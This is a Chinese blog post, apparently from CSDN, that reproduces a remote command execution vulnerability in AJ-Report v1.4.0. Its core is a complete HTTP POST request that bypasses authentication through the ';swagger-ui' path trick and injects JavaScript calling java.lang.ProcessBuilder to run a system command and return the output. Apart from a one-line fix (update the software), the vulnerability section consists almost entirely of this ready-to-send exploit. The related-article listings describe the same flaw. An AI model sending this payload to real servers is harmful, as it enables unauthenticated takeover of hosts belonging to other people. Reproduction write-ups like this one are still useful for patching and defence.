AJ-Report开源数据大屏远程命令执行漏洞

最新推荐文章于 2024-05-14 12:45:00 发布
最新推荐文章于 2024-05-14 12:45:00 发布
阅读量480 收藏 2
点赞数 15
分类专栏: 漏洞复现 漏洞 挖洞 文章标签: 漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/138522926
版权
漏洞复现 同时被 3 个专栏收录
13 篇文章 0 订阅
订阅专栏
漏洞
10 篇文章 1 订阅
订阅专栏
挖洞
3 篇文章 0 订阅
订阅专栏

文章目录

描述

AJ-Report是全开源的一个BI平台,酷炫大屏展示,能随时随地掌控业务动态,让每个决策都有数据支撑。
    多数据源支持,内置mysql、elasticsearch、kudu驱动,支持自定义数据集省去数据接口开发,目前已支持30+种大屏组件/图表,不会开发,照着设计稿也可以制作大屏。

漏洞原理

通过调用/verification;swagger-ui/接口,构造js代码调用java类中的ProcessBuilder来执行系统命令并获取其输出

影响版本

AJ-Report v1.4.0

漏洞复现

在这里插入图片描述
构造请求数据包

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 347

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ip\",\"a\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

数据包进行发送
在这里插入图片描述
漏洞复现成功

修复方案

更新至最新版本

抠脚大汉在网络
关注
  • 15
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AJ-Report代码执行漏洞分析
qq_18193739的博客
05-06 1030
verification方法传入参数,调用了eval执行JavaScript 代码,导致的代码执行漏洞。使用;绕过鉴权。
AJ-Report 初学(入门教程)
热门推荐
xhmico的博客
03-15 2万+
文章目录前言简介官网与源码下载地址准备工作1.下载2. 数据库准备发行版的配置与启动1. 修改 bootstrap.yml2. 修改 start.bat3. 启动与访问源码的配置与启动1. IDEA 导入项目2. 后端启动2. 前端启动我所踩过的坑1. 除 mysql 之外的驱动问题2. 请求超时问题3. 空值导致的空指针异常4. 表字段长度不够5. 导出文件失败总结 前言 项目里面需要用到这个 AJ-Reprot 生成动态的大报表,这两天也研究了下,觉得是个挺不错的开源项目,遂即整理一下以作分享。
这个数据可视化大项目太好用了,直观酷炫,科技感满满,绝了
m0_68103666的博客
05-14 1160
数据可视化在当下的工作当中被我们频繁提到或者是利用到,也是因为视觉仍然是目前人们从外界获取信息的主要来源途径。通过图表的处理,我们能够更快速的获取数据要传达的信息。今天给大家推荐一款目前我见过最好的数据可视化项目。
AJ-Report开源数据可视化引擎入门实践
Heartsuit的博客
07-29 3838
这篇文章是关于 AJ-Report 内部分享的小总结,当时是按照以下内容进行讲解演示的。 下载、源码启动 数据源、数据集、大可视化 扩展数据源: ClickHouse 开源数据可视化引擎: DataEase , FlyFish , GoView , DataGear , Superset , Grafana , Metabase … AJ-Report是全开源的一个国产BI平台,基于Spring Boot+MyBatisPlus+Vue技术栈实现的前后端分离项目,易于部署与整合。
AJ-Report二次开发环境配置踩坑
Remo_jun的博客
07-04 1237
这里是配置供前后端分离的环境,java小白,本机java的环境几乎是零,这边写一些配置环境遇到的问题。建议先配置后端再配置前端。
AJ-Report是一个完全开源,拖拽编辑的可视化设计工具
欧菲丽的博客
05-23 1562
AJ-Report是全开源的一个BI平台,酷炫大展示,能随时随地掌控业务动态,让每个决策都有数据支撑。多数据源支持,内置mysql、elasticsearch、kudu驱动,支持自定义数据集省去数据接口开发,目前已支持30+种大组件/图表,不会开发,照着设计稿也可以制作大。三步轻松完成大设计:配置数据源---->写SQL配置数据集---->拖拽配置大---->保存发布。欢迎体验。组件介绍大设计(AJ-Report)是一个可视化拖拽编辑的,直观,酷炫,具有科技感的图表工具全开源项目。
AJ-Report是一个完全开源,拖拽编辑的可视化设计工具。三步快速完成大:配置数据源---->写SQL配置.zip
03-04
AJ-Report中,配置数据源是构建大报告的第一步。这个过程涉及连接到各种数据仓库,如MySQL、Oracle、SQL Server、Hadoop等。用户可以根据实际需求选择合适的数据库,输入相应的连接信息,包括服务器地址、端口号...
AJ-Report一个完全开源,拖拽编辑的可视化设计工具 三步快速完成大:配置数据源->写SQL配置数据集->拖拽生成大
最新发布
05-29
AJ-Report是一款强大的开源报表工具,专为满足企业对数据可视化和大设计的需求而设计。这款工具的核心特性在于其拖拽编辑功能,使得非技术人员也能轻松构建专业的大数据分析展示界面。通过简单易用的三步流程,...
AJ-Report是全开源的一个BI平台,酷炫大展示,能随时随地掌控业务动态,让每个决策都有数据支撑.rar
06-30
AJ-Report由 安吉加加 开源的一个BI平台,酷炫大展示,能随时随地掌控业务动态,让每个决策都有数据支撑。 多数据源支持,内置 mysql 、elasticsearch、kudu驱动,支持自定义数据集省去数据接口开发,支持17种...
aj-report 编辑一个完整的大显示报表
09-11 3051
制作一个aj-report实例
AJ-Report小白配置大手册
CodeRain的博客
07-18 3730
AJ-Report 小白配置大教程
AJ-Report增加http调用自定义实现,支持text/html类型的返回值
zhao_god的专栏
07-17 522
http方式是需要通过http调用查询目标服务的接口,将结果展示出来,但是目前官方的http调用只支持json类型的返回数据源,对text类型并不支持,官方的解释是json已经满足了大部分场景,所以只支持这一种。总结:这样的改造是最少的,还有一种方式是通过sql方式,那样就需要系统将druid数据源的监控指标通过后台线程采集到表里,需要对druid内置的api进行重写,这样我觉得更麻烦,改开源代码的改动量更少一些,顺便还能提个PR,但是......没关系,至少是一次不错的尝试ヾ(◍°∇°◍)ノ゙。
AJ-Report二次开发2:新增自定义组件
Remo_jun的博客
06-06 1541
以新增表格组件为例子,关于AJ-Report新增自定义表格组件的参考。
Aj_Report 前后端分离源码nginx部署
weixin_42582510的博客
09-08 1697
1、下载源码,修改后端sql连接地址和账户,通过idea运行,打jar包。2、前端运行,执行 npm run build,生成dist,3、下载nginx,配置端口,前端地址,启动nginx。放在创建的report-ui文件下。(不让无法访问到登录界面)4、运行jar,输入。
AJ-Report二次开发——新增组件(水滴图)
weixin_73296097的博客
03-14 1576
最近做了一个项目,需要用到 AJ-Report 可视化开发一个大报表页面,正好遇到了一个这个项目里没有没有的一个组件——水滴图,研究了几天,结合百家之长也算是成功了,想到自己开发组件踩过的坑,随即整理了一下自己的经验来分享,让后面需要二次开发的朋友不那么迷茫。
aj-report如何使用?
08-19 3905
上一篇,也就是如何修改aj-report过于专业,对于熟悉vue的小伙伴们可能难度比较小,对于不熟悉前端开发的小伙伴们可能还是有一些难度的,今天的博文往后退一退,我们来看看aj-report的基本使用。
AJ-Report二次开发3:部分经验记录总结
Remo_jun的博客
06-15 481
这里是记录一些可能需要用到的地方,包括但不限于根据官方微信群的问题记录与总结,相当于日志的存在,不定期记录。
aj-report添加组件
05-08
AJ-Report是一款常用的报表工具,具有轻量、易用和灵活定制的特点。在使用AJ-Report进行报表开发时,可以根据需要添加所需的组件,以满足报表设计的需求。下面将介绍AJ-Report添加组件的方法。 首先,打开AJ-Report的报表设计器界面,选择需要添加组件的报表,点击鼠标右键,在弹出的菜单中选择“添加控件”命令,系统会弹出可供添加的组件列表。 在组件列表中,可以选择需要添加的组件,例如文本框、表格、图表等,在选择完组件后,将其拖拽到报表的相应位置即可。在拖拽组件时,可以通过Ctrl键或Shift键多选或多拖拽组件。 添加组件后,还可以对其进行进一步的定制。在组件的属性面板中,可以设置组件的颜色、字体、排版等样式属性,也可以设置组件的数据源、数据筛选等数据属性。 此外,在AJ-Report中还可以通过自定义组件来扩展报表的功能。在报表设计器中,可以创建自定义控件,并通过代码进行定制和开发。自定义组件在展示数据或实现业务逻辑时,具有强大的灵活性和可扩展性。 总的来说,AJ-Report添加组件的方法很简单,在设计器中选择需要添加的组件,拖拽到相应位置即可。同时,AJ-Report还具有自定义组件功能,可以扩展报表的功能。通过添加组件和定制组件,可以让AJ-Report的报表工作更加灵活和高效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值